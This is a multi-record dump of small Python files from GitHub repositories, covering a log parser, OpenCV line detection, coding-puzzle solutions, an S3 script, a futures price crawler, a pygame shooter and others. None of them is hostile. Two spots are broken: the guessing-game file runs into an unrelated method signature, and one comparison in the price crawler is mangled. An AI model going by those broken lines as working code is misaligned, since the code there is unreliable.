save it?\n timeout (\"int\"): maximum time for install\n\n Raises:\n Exception\n\n Returns:\n True if install succeeded else False\n \"\"\"\n return execute_install_package(\n device, image_dir, image, save_system_config, timeout, _install=False)","repo_name":"aramidetosin/IPv6-OSPF-BGP","sub_path":"venv/lib/python3.8/site-packages/genie/libs/sdk/apis/iosxe/platform/execute.py","file_name":"execute.py","file_ext":"py","file_size_in_byte":8205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"}
+{"seq_id":"36824308300","text":"#! /usr/bin/python3\nimport re\nfrom datetime import datetime\nimport functools\nimport sys\n\nxlist, xlistF = [], []\n\n\ndef exception_handling(func):\n @functools.wraps(func)\n def inner():\n try:\n return func()\n except FileNotFoundError as er:\n print('No Such File Found, Please Try Again!!!')\n return None\n except IndexError as er2:\n print(\"Please Enter File Path while Running the Script\")\n\n return inner\n\n\n@exception_handling\ndef file_read():\n filepath = sys.argv[1] # To catch External Vars passed while running the script. We start with [1] cause it takes the .py script itself as argument [0]\n fp = open(filepath, 'r')\n for line in fp:\n if re.search(\"localhost.com:\", line):\n temp = re.sub('[\\n: \\t]', '', line)\n elif re.search(\"Failed\", line):\n if '0' in line:\n xlist.append(temp)\n else:\n xlistF.append(temp)\n fp.close()\n sort_list(xlist, xlistF)\n out_puts()\n out_putf()\n\n\ndef sort_list(xlist, xlistF):\n global listS, listF\n xlist, listF = list(dict.fromkeys(xlist)), list(dict.fromkeys(xlistF))\n listS = (list(set(xlist).difference(set(xlistF))))\n\n\ndef out_puts():\n print('----------SUCCESS-----------')\n sfile = open('Success_Log--' + datetime.now().strftime(\"%d-%m-%Y_%I-%M-%S_%p\"), 'w')\n for line in listS:\n print(line)\n sfile.write(line)\n sfile.write(\"\\n\")\n sfile.close()\n\n\ndef out_putf():\n print('----------FAILED-----------')\n xfile = open('Failed_Log--' + datetime.now().strftime(\"%d-%m-%Y_%I-%M-%S_%p\"), 'w')\n if not listF:\n print('Nothing Failed')\n xfile.write('Nothing Failed')\n else:\n for line in listS:\n print(line)\n xfile.write(line)\n xfile.write(\"\\n\")\n xfile.close()\n\n\nfile_read()","repo_name":"som2016/Python_tutorial","sub_path":"minionscript_v1.py","file_name":"minionscript_v1.py","file_ext":"py","file_size_in_byte":1878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"}
+{"seq_id":"5067510525","text":"import math\n\nimport cv2\nimport numpy as np\n\ntxt = open(\"testData-one.txt\", encoding='utf-8-sig').readline()\narr = txt.split(\",\")\nimage = np.zeros((600, 3200), dtype=np.ubyte)\n\nfor i in range(0, 3200 - 1):\n h = int(int(arr[i]) / 1000)\n if h > 499:\n h = 499\n if h < 0:\n h = 0\n for j in range(0, 8):\n image[h - j][i] = 255\ncv2.imshow(\"image\", image)\n\n# cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)\nlines = cv2.HoughLinesP(image, 1, np.pi / 180, 100, minLineLength=100, maxLineGap=0)\n\nif lines is not None:\n for i in range(0, len(lines)):\n # 向上偏移gap像素\n gap = 20\n cv2.line(image, (lines[i][0][0], lines[i][0][1]-gap), (lines[i][0][2], lines[i][0][3]-gap), 200, 3, cv2.LINE_AA)\n\ncv2.imshow(\"image\", image)\ncv2.imwrite(\"image.jpg\", image)\ncv2.waitKey(0)\n\n#\n#\n# image = cv2.imread('C:\\\\Users\\\\lin.chen1\\\\Desktop/disk1.jpg')\n# output = image.copy()\n# img = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n#\n# # Find circles\n#\n# minDist = 100\n# param1 = 30 # 500\n# param2 = 50 # 500 #smaller value-> more false circles\n# minRadius = 5\n# maxRadius = 20 # 10\n#\n# # docstring of HoughCircles: HoughCircles(image, method, dp, minDist[, circles[, param1[, param2[, minRadius[, maxRadius]]]]]) -> circles\n# circles = cv2.HoughCircles(img, cv2.HOUGH_GRADIENT, 1.3, minDist, param1=param1, param2=param2, minRadius=minRadius,\n# maxRadius=maxRadius)\n#\n# # If some circle is found\n# if circles is not None:\n# # Get the (x, y, r) as integers\n# circles = np.round(circles[0, :]).astype(\"int\")\n# print(circles)\n# # loop over the circles\n# for (x, y, r) in circles:\n# cv2.circle(output, (x, y), r, (0, 255, 0), 2)\n# # show the output image\n# cv2.imshow(\"circle\", output)\n","repo_name":"aspojo/learnOpenCV","sub_path":"detectLines.py","file_name":"detectLines.py","file_ext":"py","file_size_in_byte":1761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"}
+{"seq_id":"74684381750","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Sep 16 20:24:23 2017\n\n@author: tizianomartinhernando\n\"\"\"\n\n'''\nConfeccionar un programa que genere un número aleatorio\n entre 1 y 100 y no se muestre.\nEl operador debe tratar de adivinar el número ingresado.\nCada vez que ingrese un número mostrar un mensaje \"Gano\"\n si es igual al generado o \n \"El número aleatorio el mayor\" o\n \"El número aleatorio es menor\".\nMostrar cuando gana el jugador cuantos intentos necesitó.'''\n\nimport random\n\nintentos=0\naleatorio=random.randint(1,100)\nelegido=-1\nprint('Intenta adivinar el numero que pense entre 1 y 100: ')\nwhile (elegido!=aleatorio):\n elegido=int(input('Cual numero elige? : '))\n if aleatorio>elegido:\n print('Piense en un valor mayor')\n else:\n if aleatorio int:\n \n cost_diff = [x[0]- x[1] for x in costs]\n \n sorted_costs = [y for x,y in sorted(zip(cost_diff, costs))]\n \n length = int(len(costs)/2)\n \n total_cost = sum([x[0] for x in sorted_costs[:length]]) + sum([x[1] for x in sorted_costs[length:]])\n \n return total_cost\n \n \n","repo_name":"Ansh1234/Leetcode-June-Challenge","sub_path":"June_3.py","file_name":"June_3.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"}
+{"seq_id":"18249567769","text":"from collections import defaultdict\n\nn = int(input())\na = [int(x) for x in input().split()]\n\ncnt = defaultdict(int)\nfor v in a:\n cnt[v] += 1\n\nans = 0\nfor v in cnt:\n ans += cnt[v]*(cnt[v]-1)//2\n\nfor v in a:\n print(ans + (cnt[v]-1)*(cnt[v]-2)//2 - cnt[v]*(cnt[v]-1)//2)","repo_name":"Aasthaengg/IBMdataset","sub_path":"Python_codes/p02732/s710022247.py","file_name":"s710022247.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"}
+{"seq_id":"30710427869","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def averageOfLevels(self, root: Optional[TreeNode]) -> List[float]:\n queue=[root,-1]\n sum_=[]\n ans=[]\n while queue!=[]:\n a=queue.pop(0)\n if a==-1 :\n ans.append(sum(sum_)/len(sum_))\n sum_=[]\n if queue!=[]:\n queue.append(-1)\n else:\n sum_.append(a.val)\n if a.left:\n queue.append(a.left)\n if a.right:\n queue.append(a.right)\n return ans ","repo_name":"vedaditya/leetcode","sub_path":"637-average-of-levels-in-binary-tree/637-average-of-levels-in-binary-tree.py","file_name":"637-average-of-levels-in-binary-tree.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"}
+{"seq_id":"5199239899","text":"import boto3 #Para interagir com o AWS S3\nimport pandas as pd\n\n\ns3_client = boto3.client('s3')\ns3_client.download_file(\"datalake-rafa-igti\",\"data/Cronograma de Estudo.xlsx\",\"Download_efetuado.xlsx\") #Fazendo o Dowload no Arquivo\n\npf = pd.read_excel(\"Download_efetuado.xlsx\")\nprint(pf)\n\ns3_client.upload_file(\"Arquivo_para_Upload.xlsx\",\"datalake-rafa-igti\",\"data/Arquivo_para_Upload.xlsx\")","repo_name":"rafael7238/Cursos_Resumos","sub_path":"ENGENHARIA DE DADOS/1_bootcamp_buket_s3.py","file_name":"1_bootcamp_buket_s3.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"}
+{"seq_id":"17038618383","text":"import json\nimport os\n\ndef validateJsonFile(jsonFile):\n try:\n json.load(jsonFile)\n except ValueError as err:\n print(err)\n return False\n return True\n\npath_to_json = 'json/'\n\njson_files = [pos_json for pos_json in os.listdir(path_to_json) if pos_json.endswith('.json')]\nfor index, js in enumerate(json_files):\n with open(os.path.join(path_to_json, js)) as json_file:\n if(validateJsonFile(json_file)==True):\n print(\"Given JSON file \"+json_files[index]+\" is valid\")\n print(\"------------------------------------\")\n else:\n print(\"Given JSON file \"+json_files[index]+\" is not valid\")\n print(\"------------------------------------\")\n","repo_name":"cepdnaclk/e18-co227-Interactive-Department-Map-GroupA","sub_path":".github/workflows/jsonFormatValidator.py","file_name":"jsonFormatValidator.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"90"}
+{"seq_id":"3385146785","text":"# Configuration file for Flask-WTF\nimport os\n\n# Setup SQL Alchemy\nbasedir = os.path.abspath(os.path.dirname(__file__))\nSQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(basedir, 'app.db')\nSQLALCHEMY_MIGRATE_REPO = os.path.join(basedir, 'db_repository')\n# Disables flask-sqlalchemy's event-notification system (http://bit.ly/1YJ7WXl)\nSQLALCHEMY_TRACK_MODIFICATIONS = False\n\nWTF_CSRF_ENABLED = True # Activates cross-site request forgery prevention\nSECRET_KEY = 'you-will-never-guess' # Needed when CSRF is enabled\n\nOPENID_PROVIDERS = [\n {'name': 'Yahoo', 'url': 'https://me.yahoo.com'},\n {'name': 'AOL', 'url': 'http://openid.aol.com/'},\n {'name': 'Flickr', 'url': 'http://www.flickr.com/'},\n {'name': 'MyOpenID', 'url': 'https://www.myopenid.com'}\n ]\n","repo_name":"treystaff/flask_microblog","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"}
+{"seq_id":"39344211516","text":"from labjack import ljm\nfrom beampattern.utils.beampattern_exceptions import BeamPatternArgumentError\n\nclass LabJackT7(object):\n def __init__(self, debug=True):\n self.handle = ljm.openS(\"ANY\", \"ANY\", \"ANY\")\n info = ljm.getHandleInfo(self.handle)\n if debug:\n print(\"Opened a LabJack with Device type: %i, Connection type: %i,\\n\"\n \"Serial number: %i, IP address: %s, Port: %i,\\nMax bytes per MB: %i\" %\n (info[0], info[1], info[2], ljm.numberToIP(info[3]), info[4], info[5]))\n\n def digital_output(self, channel, level):\n if channel not in range(8):\n raise BeamPatternArgumentError(\"LabJack T7\", \"channel should be >= 0 and <8\")\n if level not in (0, 1):\n raise BeamPatternArgumentError(\"LabJack T7\", \"level should be 0 or 1\")\n ljm.eWriteName(self.handle, 'FIO%1d' % channel, level)\n\n \n","repo_name":"gopastro/pybeampattern","sub_path":"beampattern/labjack/labjack_t7.py","file_name":"labjack_t7.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"}
+{"seq_id":"24083214664","text":"# -*- coding: utf-8 -*-\nimport os\nfrom gensim.models import Word2Vec\nfrom matplotlib import pyplot\nimport pandas as pd\nimport numpy as np\nfrom scipy import spatial\n\n# %%\n\ndef read_excel(filename, sheet):\n if not os.path.isfile(filename):\n raise Exception(\"File {0} does not exist!\".format(filename))\n with pd.ExcelFile(filename) as xls:\n return pd.read_excel(xls, sheet)\n\ndef save_excel(data, filename):\n with pd.ExcelWriter(filename) as writer:\n for (df, name) in data:\n df.to_excel(writer, name)\n writer.save()\n\ndef load_model_vector(filename):\n model = Word2Vec.load(filename)\n word_vectors = model.wv\n del model\n return word_vectors\n\n# %%\n\nclass SimilarWordGenerater():\n\n def __init__(self, word_vectors):\n self.word_vectors = word_vectors\n\n def flatten(self, items):\n return [ item for sublist in items for item in sublist ]\n\n def get_similar(self, words, iter=1, topn=3, similar_threshold = 0.0):\n return self.flatten([ [ y[0] for y in self.word_vectors.most_similar(x, topn=topn) if y[1] >= similar_threshold ] for x in words ])\n\n #def generate0(self, words, iter=1, topn=3, similar_threshold = 0.0):\n # if isinstance(words,str): words = [ words ]\n # if iter < 0 or len(words) == 0: return []\n # similar_words = list(set(self.get_similar(words, iter, topn, similar_threshold)) - set(words))\n # return list(set(words + self.generate0(similar_words, iter-1, topn)))\n\n def generate(self, words, iter=1, topn=3, cumulated_words = [], similar_threshold = 0.5):\n #print('{}: {}'.format(iter, cumulated_words))\n if isinstance(words,str): words = [ words ]\n if iter < 0 or len(words) == 0: return cumulated_words\n cumulated_words = list(set(cumulated_words + words))\n similar_words = list(set(self.get_similar(words, iter, topn, similar_threshold)) - set(cumulated_words))\n return self.generate(similar_words, iter-1, topn, cumulated_words)\n\n# %%\ndef word_scale_similarity(word_vectors, scale_x_pair, scale_y_pair, word_list):\n\n scale_x = word_vectors[scale_x_pair[0]] - word_vectors[scale_x_pair[1]]\n scale_y = word_vectors[scale_y_pair[0]] - word_vectors[scale_y_pair[1]]\n\n word_x_similarity = [1 - spatial.distance.cosine(scale_x, word_vectors[x]) for x in word_list ]\n word_y_similarity = [1 - spatial.distance.cosine(scale_y, word_vectors[x]) for x in word_list ]\n\n df = pd.DataFrame({ 'word': word_list, 'x': word_x_similarity, 'y': word_y_similarity })\n\n return df\n\n# %%\n\ndef word_pair_list_similarity(word_vectors, word_x, word_y, word_list):\n\n word_x_similarity = [ word_vectors.similarity(x, word_x) for x in word_list ]\n word_y_similarity = [ word_vectors.similarity(x, word_y) for x in word_list ]\n\n df = pd.DataFrame({ 'word': word_list, 'x': word_x_similarity, 'y': word_y_similarity })\n\n return df\n\n# %%\n\ndef word_pair_list_similarity2(word_vectors, word_x, word_y, seed_word, topn=100):\n\n\n word_toplist = [ seed_word ] + [ z[0] for z in word_vectors.most_similar_cosmul(seed_word, topn=100) ]\n\n word_x_similarity = [ word_vectors.similarity(x, word_x) for x in word_toplist ]\n word_y_similarity = [ word_vectors.similarity(x, word_y) for x in word_toplist ]\n\n df = pd.DataFrame({ 'word': word_toplist, 'x': word_x_similarity, 'y': word_y_similarity })\n\n return df\n\n# %%\n\ndef word_pair_toplist_similarity(word_vectors, word_x, word_y, topn=50):\n\n word_x_toplist = [ word_x ] + word_vectors.most_similar_cosmul(word_x, topn=topn)\n word_y_toplist = [ word_y ] + word_vectors.most_similar_cosmul(word_y, 
topn=topn)\n\n word_toplist = [ x[0] for x in word_x_toplist + word_y_toplist ]\n\n return word_pair_list_similarity(word_vectors, word_x, word_y, word_toplist)\n\n## %%\n#\n#def word_pair_list_similarity(word_vectors, word_x, word_y, word_list, topn=50):\n#\n# word_x_toplist = [ word_x ] + word_vectors.most_similar_cosmul(word_x, topn=topn)\n# word_y_toplist = [ word_y ] + word_vectors.most_similar_cosmul(word_y, topn=topn)\n#\n# word_toplist = [ x[0] for x in wordlist ]\n#\n# word_x_similarity = [ word_vectors.similarity(x, word_x) for x in word_toplist ]\n# word_y_similarity = [ word_vectors.similarity(x, word_y) for x in word_toplist ]\n#\n# df = pd.DataFrame({ 'word': word_toplist, 'x': word_x_similarity, 'y': word_y_similarity })\n#\n# return df\n# %%\n\ndef plot_df(df,xlabel=None,ylabel=None):\n fig = pyplot.figure()\n #pyplot.plot([0,0.75], [0,0.75])\n if not xlabel is None: pyplot.xlabel(xlabel)\n if not ylabel is None: pyplot.ylabel(ylabel)\n ax = fig.add_subplot(1, 1, 1)\n ax.scatter(df['x'], df['y'],marker='o')\n for i, txt in enumerate(df['word']):\n ax.annotate(txt, xy=(df['x'].iloc[i], df['y'].iloc[i])) #, textcoords = 'offset points', ha = 'left', va = 'top', **TEXT_KW)\n pyplot.show()\n\n# %%\n\ndef generate_plot(words, x_word, y_word, iter=5, topn=3, similar_threshold= 0.5):\n word_list = SimilarWordGenerater(word_vectors).generate(words, iter, topn, [], similar_threshold)\n df = word_pair_list_similarity(word_vectors, x_word, y_word, word_list)\n plot_df(df,'<--- {} --->'.format(x_word), '<--- {} --->'.format(y_word))\n\n\n# %%\n\n#filename = '../data/output/w2v_model_skip_gram_win_5_dim_50_iter_20_mc_5_complete_not_segmented.dat'\n#filename = '../data/output/w2v_model_skip_gram_win_10_dim_100_iter_20_mc_5_segmented_1980-1014.dat'\n\n# %%\nfilename = '../data/output/w2v_model_skip_gram_win_5_dim_100_iter_20_mc_5_benedict-xvi.dat'\n\nword_vectors = load_model_vector(filename)\n\n# %%\n#word_list = SimilarWordGenerater(word_vectors).generate(['jordbruk'], 5, topn=3)\n\n\ndf_toplist = read_excel(\"../relevant_words.xlsx\", \"toplist1\")\nword_list = list(df_toplist.words.values)\n\nword_list = [ x for x in word_list if x in word_vectors.vocab.keys() ]\n\n# %%\ndf = word_pair_list_similarity(word_vectors, 'west', 'east', word_list)\nplot_df(df,'<--- West --->', '<--- East --->')\n\n\n# %%\n\ndf = word_pair_toplist_similarity(word_vectors, 'west', 'evil')\nplot_df(df,'West', 'East')\n\n\n# %%\n\ndf = word_pair_list_similarity2(word_vectors, 'north', 'south', 'poor')\nplot_df(df,'North', 'South')\n\n# %%\n\ndf = word_pair_toplist_similarity(word_vectors, 'industri', 'jordbruk')\nplot_df(df)\n# %%\n\ndf = word_pair_toplist_similarity(word_vectors, 'krig', 'fred')\nplot_df(df)\n# %%\n\ndf = word_pair_toplist_similarity(word_vectors, 'industri', 'hantverk')\nplot_df(df)\n\n\n# %%\ndf_swe_loc = pd.read_excel('../data/ner_swe_loc_plc.xlsx', 'swe_loc_plc')\ndf_place_minus_one = pd.DataFrame(df_swe_loc.place.apply(lambda x: x[:-1]))\ndf_place_minus_one.columns = ['place']\nswe_loc_list = list(pd.merge(df_swe_loc,df_place_minus_one,how='inner',left_on='place',right_on='place')['place'].unique())\nswe_loc_list = [ x for x in swe_loc_list if x in word_vectors.vocab ]\ndf = word_pair_list_similarity(word_vectors, 'industri', 'jordbruk',swe_loc_list)\nplot_df(df,'<--- Industri --->', '<--- Jordbruk --->')\n\n\n# %%\n\ndf = word_pair_toplist_similarity(word_vectors, 'girl', 'boy')\nplot_df(df, 'Girl', 'Boy')\n\n# %%\nword_list = SimilarWordGenerater(word_vectors).generate(['kärnkraft'], 5, 
topn=3)\ndf_scale = word_scale_similarity(word_vectors, ('stad', 'landsbygd'), ('jordbruk', 'industri'), word_list)\nplot_df(df_scale, 'Stad ---- Landsbygd', 'jordbruk ---- industri')\n\n# %%\nword_list = SimilarWordGenerater(word_vectors).generate(['kärnkraft'], 5, topn=2)\ndf = word_pair_list_similarity(word_vectors, 'sovjetunionen', 'england',word_list)\nplot_df(df, 'Sovjet', 'England')\n\n\n","repo_name":"humlab/text_analytic_tools","sub_path":"pending_deletes/vector_spaces/scripts/visualize_analogy.py","file_name":"visualize_analogy.py","file_ext":"py","file_size_in_byte":7521,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"90"}
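Using the script's own helpers, plotting another word pair takes three calls; the seed and axis words below are illustrative and must exist in the loaded model's vocabulary:

```python
word_list = SimilarWordGenerater(word_vectors).generate(["fred"], 3, topn=3)
df = word_pair_list_similarity(word_vectors, "krig", "fred", word_list)
plot_df(df, "<--- krig --->", "<--- fred --->")
```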
+{"seq_id":"43002952995","text":"# 4 . Try to extract only a list collection form list l\r\n\r\n# Try to extract only a list collection form list l\r\nimport logging\r\nlogging.basicConfig(filename=\"logfile1.log\",level=logging.INFO,format='%(asctime)s %(levelname)s %(message)s')\r\n\r\nclass Program4:\r\n\r\n log = logging.getLogger(\"logfile1.log\")\r\n # Declare a list\r\n try:\r\n l = [3, 4, 5, 6, 7, [23, 456, 67, 8, 78, 78], [345, 56, 87, 8, 98, 9], (234, 6657, 6),\r\n {\"key1\": \"sudh\", 234: [23, 45, 656]}]\r\n\r\n except Exception as e:\r\n log.info(e)\r\n\r\n # extract only a list collection form list l\r\n\r\n log.info(\"extract only a list collection form list l\")\r\n log.info(l[-4:-1])","repo_name":"Sharanv321/Data-Science-iNeuron-TasksChallenges","sub_path":"Task-2July2022-main/Program4.py","file_name":"Program4.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"}
+{"seq_id":"26326846755","text":"import sys\nimport io\nimport math\nsys.setrecursionlimit(10**8)\n_INPUT = \"\"\"\\\n125 175 250 300 400 525 600 650\n\"\"\"\nsys.stdin = io.StringIO(_INPUT)\nreadline=sys.stdin.readline\nS = list(map(int, readline().split()))\nfor i in range(len(S)):\n s = S[i]\n if s % 25 != 0:\n break\n if s < 100 or s > 675:\n break\n if i != 0 and s < S[i-1]:\n \n break\nelse:\n print(\"Yes\")\n exit()\nprint(\"No\")","repo_name":"Amano-take/Atcoder","sub_path":"300/0/308/A.py","file_name":"A.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"}
+{"seq_id":"32986079098","text":"from challenges.tree.tree import *\nfrom challenges.tree.fizz_buzz_tree import *\n\ndef test_fizz_buzz():\n fizz = BinaryTree()\n fizz.root = TNode(1)\n fizz.root.left = TNode(10)\n fizz.root.right = TNode(12)\n fizz.root.left.left = TNode(2)\n fizz.root.left.right = TNode(18)\n fizz.root.right.right = TNode(15)\n actual = fizz_buzz_tree(fizz).pre_order()\n print(actual)\n expected = \"[1, 'Buzz', 2, 'Fizz', 'Fizz', 'FizzBuzz']\"\n assert actual == expected\n\ndef test_fizz_buzz_second():\n fizz = BinaryTree()\n fizz.root = TNode(1)\n fizz.root.left = TNode(3)\n fizz.root.right = TNode(9)\n fizz.root.left.left = TNode(12)\n fizz.root.left.right = TNode(15)\n fizz.root.right.right = TNode(18)\n fizz.root.right.right.right = TNode(30)\n actual = fizz_buzz_tree(fizz).pre_order()\n print(actual)\n expected = \"[1, 'Fizz', 'Fizz', 'FizzBuzz', 'Fizz', 'Fizz', 'FizzBuzz']\"\n assert actual == expected\n\ndef test_fizz_buzz_second():\n fizz = BinaryTree()\n fizz.root = TNode(2)\n fizz.root.left = TNode(4)\n fizz.root.right = TNode(8)\n fizz.root.left.left = TNode(13)\n fizz.root.left.right = TNode(19)\n fizz.root.right.right = TNode(22)\n fizz.root.right.right.right = TNode(26)\n actual = fizz_buzz_tree(fizz).pre_order()\n print(actual)\n expected = \"[2, 4, 13, 19, 8, 22, 26]\"\n assert actual == expected\n\n","repo_name":"YahyaOmari/data-structures-and-algorithms","sub_path":"python/tests/test_fizz_buzz.py","file_name":"test_fizz_buzz.py","file_ext":"py","file_size_in_byte":1378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"}
+{"seq_id":"16829476415","text":"import requests, pandas, csv, time\nimport mail,music\nurl1=\"http://info512.taifex.com.tw/Future/FusaQuote_Norl.aspx\"\nurl2=\"http://info512ah.taifex.com.tw/Future/FusaQuote_Norl.aspx\"\n\n\ndef main():\n\t'''\n\t\tsetting entry,price,mail,music from function\n\t'''\n\n\tentry=setting_entry()\n\tprice=setting_price()\n\tmail_control={'mail_times_max':setting_mail_times_max(),'mail_times':0}\n\tmusic_control=setting_music()\n\t#Every 5 secs check\n\twhile 1:\n\t\t'''\n\t\t\tcrawl and check price\n\t\t'''\n\n\t\ttime.sleep(1)\n\t\tvartime=time.localtime()\n\t\turl=check_url()\n\t\tif not url: \n\t\t\tprint('睡覺')\n\t\t\tcontinue\n\t\ttry:\n\t\t\tmail_control=check_price(url,vartime,entry,price,mail_control,music_control)\n\t\texcept KeyboardInterrupt:\n\t\t\tprint(\"Stop\")\n\t\texcept (IndexError,TypeError):\n\t\t\tprint(\"IndexError or TypeError\")\n\t\texcept ConnectionError:\n\t\t\tprint(\"ConnectionError\")\n\t\texcept:\n\t\t \tprint(\"Some Error\")\ndef check_url():\n\t'''\n\t\tcheck time to change url or sleep\n\t'''\n\n\tif time.localtime().tm_wday==5 and time.localtime().tm_hour==5 :\n\t\tprint('週末睡兩天')\n\t\twhile(1):\n\t\t\ttime.sleep(60)\n\t\t\tif time.localtime().tm_wday==7 and time.localtime().tm_hour==5 :\n\t\t\t\tbreak\n\telif ((time.localtime().tm_hour*60+time.localtime().tm_min>=8*60+45) and \n\t\t(time.localtime().tm_hour*60+time.localtime().tm_min<=13*60+45)):\n\t\turl=url1\n\telif((time.localtime().tm_hour*60+time.localtime().tm_min>=15*60) or\n\t\t(time.localtime().tm_hour*60+time.localtime().tm_min<=5*60)):\n\t\turl=url2\n\telse :\n\t\turl=''\n\treturn url\n\ndef check_price(url,vartime,entry,price,mail_control,music_control):\n\t'''\n\t\tcrawl price and caculate profit \n\t\tif touch price , send mail\n\t'''\n\tres=requests.post(url)\n\tres.encoding='utf-8'\n\tdf=pandas.read_html(res.text, attrs={'class':'custDataGrid'})[0].iloc[2][2]\n\n\t##crawl price\n\tif(entry['toggle']=='y'):\n\t\tprofit=str((float(df)-float(entry['entry_price']))*float(entry['position'])*float(entry['lot'])*50)\n\t\tprint(time.strftime('%Y/%m/%d %H:%M:%S',vartime)+'\\t即時報價'+df+'\\t損益金額'+profit+'元')\n\n\telse:\n\t\tprint(time.strftime('%Y/%m/%d %H:%M:%S',vartime)+'\\t即時報價'+df)\n\n\t##send mail\t\n\tif float(df)<=price[0] and mail_control['mail_times']=price[1] and mail_control['mail_times'] 1번에 10만큼 이동해야함 -> 10*10\n # 20 fps : 1초 동안 20번 동작 - > 1번에 5만큼 이동헤야함 -> 5*20\n\n # print('fps : ' + str(clock.get_fps())) # 초당 프레임 수 출력\n\n\n # 2. 이벤트 처리 (키보드, 마우스 등)\n for event in pygame.event.get(): # 반드시 작성되어야 하는 코드, 어떤 이벤트가 발생하였는지?\n if event.type == pygame.QUIT: # 종료 버튼을 눌렀을 경우 게임은 종료, 창이 닫히는 이벤트가 발생하였는지?\n running = False # while문 종료, 게임 진행중 아님\n\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_LEFT: # 캐릭터를 좌측으로\n character_to_x -= character_speed\n elif event.key == pygame.K_RIGHT: # 캐릭터를 우측으로\n character_to_x += character_speed\n elif event.key == pygame.K_SPACE: # 무기발사\n weapon_x_pos = character_x_pos + (character_width / 2) - (weapon_width / 2)\n weapon_y_pos = character_y_pos\n weapons.append([weapon_x_pos, weapon_y_pos])\n \n if event.type == pygame.KEYUP:\n if event.key == pygame.K_LEFT or event.key == pygame.K_RIGHT:\n character_to_x = 0\n\n\n # 3. 
게임 캐릭터 위치 정의\n # 포지션 값을 변경해준다\n character_x_pos += character_to_x\n\n if character_x_pos < 0:\n character_x_pos = 0\n elif character_x_pos > screen_width - character_width:\n character_x_pos = screen_width - character_width \n\n # 무기 위치 조정\n # 100, 200 -> 180, 160, 140, ...\n # 500, 200 -> 180, 160, 140, ...\n # 모든 무기에 대해서 y의 위치를 변경가능\n weapons = [ [w[0], w[1] - weapon_speed] for w in weapons] # 무기 위치를 위로 올린다\n\n # 천장에 닿은 무기 없애기\n weapons = [ [w[0], w[1]] for w in weapons if w[1] > 0]\n\n # 4. 충돌 처리\n # 충돌 처리 (실제로 위치하고 있는 rect정보를 업데이트)\n \n\n\n # 5. 화면에 그리기\n screen.blit(background,(0,0))\n\n for weapon_x_pos, weapon_y_pos in weapons:\n screen.blit(weapon, (weapon_x_pos, weapon_y_pos))\n\n screen.blit(stage,(0,screen_height - stage_height))\n screen.blit(character,(character_x_pos,character_y_pos))\n\n \n\n\n # 게임화면 다시 그리기\n pygame.display.update()\n\n\n\n# 게임 종료\npygame.quit()","repo_name":"Comprehensible7/TIL","sub_path":"Python/Test_Project3/Basic_Frame2/2_weapon_keyevent.py","file_name":"2_weapon_keyevent.py","file_ext":"py","file_size_in_byte":4556,"program_lang":"python","lang":"ko","doc_type":"code","stars":4,"dataset":"github-code","pt":"90"}
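Step 4 (충돌 처리, collision handling) is left as a stub in the record; the usual pygame pattern is to rebuild Rects from the current on-screen positions each frame and test them with Rect.collidelist. A sketch reusing the record's variable names — the enemy rect is an assumption, since this snippet has no enemy sprite yet:

```python
# 4. collision handling: refresh rects to the current on-screen positions
character_rect = character.get_rect(topleft=(character_x_pos, character_y_pos))
weapon_rects = [weapon.get_rect(topleft=(wx, wy)) for wx, wy in weapons]

# Hypothetical target: once an enemy sprite exists, a hit test is one call.
# collidelist returns the index of the first colliding rect, or -1 for none:
# if enemy_rect.collidelist(weapon_rects) != -1:
#     ...remove that weapon and the enemy...
```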
+{"seq_id":"10078063306","text":"import os\nfrom time import gmtime, strftime, time\nfrom struct import pack\nimport logging\nimport atexit\n\n\nclass Log:\n FILE_EXT = 'csv'\n FILE_MODE = 'w'\n\n def __init__(self, cfg, signal_new_file=None):\n self.__logger = logging.getLogger(self.__class__.__name__)\n # Load Config\n if 'filename_prefix' not in cfg.keys():\n cfg['filename_prefix'] = 'Inlinino'\n if 'filename_suffix' not in cfg.keys():\n cfg['filename_suffix'] = ''\n if 'path' not in cfg.keys():\n cfg['path'] = ''\n if 'length' not in cfg.keys():\n cfg['length'] = 60 # minutes\n if 'variable_names' not in cfg.keys():\n cfg['variable_names'] = []\n if 'variable_units' not in cfg.keys():\n cfg['variable_units'] = []\n if 'variable_precision' not in cfg.keys():\n cfg['variable_precision'] = []\n\n self._file = type('obj', (object,), {'closed': True})\n self._file_timestamp = None\n # self.file_mode_binary = cfg['mode_binary']\n self.file_length = cfg['length'] * 60 # seconds\n self.filename_prefix = cfg['filename_prefix']\n self.filename_suffix = cfg['filename_suffix']\n self.filename = None\n self.set_filename()\n self.path = cfg['path']\n self.signal_new_file = signal_new_file\n\n 